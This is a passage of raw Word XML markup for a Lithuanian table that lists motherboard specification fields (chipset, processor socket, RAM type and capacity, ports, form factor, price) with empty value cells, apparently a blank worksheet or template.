            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="272BCDAB" w14:textId="17F670F8" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="567DD151" w14:textId="3327C67D" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0C3B31E9" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6522351D" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lustas (chipset)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6C5C7F5C" w14:textId="36EAECCE" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="338EE6DB" w14:textId="64589F7A" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="49B21412" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="55F65CA8" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Gamintojas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="674D8EE4" w14:textId="1616EFEA" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="256FB651" w14:textId="6D8B5A5F" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="61E429CA" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4FB8DDCA" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Procesorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="022173C4" w14:textId="2E0593AE" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5862D076" w14:textId="08FEB229" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="16614BDA" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="092422F2" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Procesoriaus lizdas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4A5D5B5B" w14:textId="2AD29935" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7A8689CC" w14:textId="26FF4A50" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3265AFF6" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2DA79DAC" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Operatyviosios atminties lizdų kiekis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1258A129" w14:textId="48CA4D7F" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D2B54EB" w14:textId="6C4C5E4B" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="34584785" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="021C3C20" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Operatyviosios atminties tipas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="103B3D3E" w14:textId="236416F2" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4BA92E0B" w14:textId="140BCA7F" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2C07E77E" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="39BC85E5" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Maksimalus operatyviosios atminties kiekis (RAM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="10696E19" w14:textId="5BF4E5DF" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="37B168A2" w14:textId="51D10D37" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5DFB084C" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4648A20B" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Operatyviosios atminties taktinis dažnis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6B7D4E98" w14:textId="392FC709" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="413D0BD0" w14:textId="5D23959E" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1334BBCC" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="027A2E5E" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Išplėtimo lizdai </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="67EA1428" w14:textId="2D03AED5" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A142DFB" w14:textId="78F368AD" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7C44218F" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="69152AC4" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Galimos galinės dalies jungtys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6C16A11A" w14:textId="0156F022" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2441681F" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="626EBEF2" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5CC862E8" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kietojo disko ir optinių įrenginių pajungimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E875725" w14:textId="60AAEC06" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7926D964" w14:textId="7F46F827" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6F9590C9" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4DA0403A" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Pagrindinės plokštės matmenys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5F96C36B" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1AD81B21" w14:textId="182D914D" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="17124655" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="57E05A04" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Pagrindinės plokštės formos </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>faktorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="54EA33FA" w14:textId="5CF316BF" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="37D8E692" w14:textId="272BF8C3" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="14D7BAD9" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3320F5CF" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Kaina </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1282D241" w14:textId="7FEB7E92" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3FC8C91A" w14:textId="74BC8948" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57989BB6" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F033F3A" w14:textId="284E1C18" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
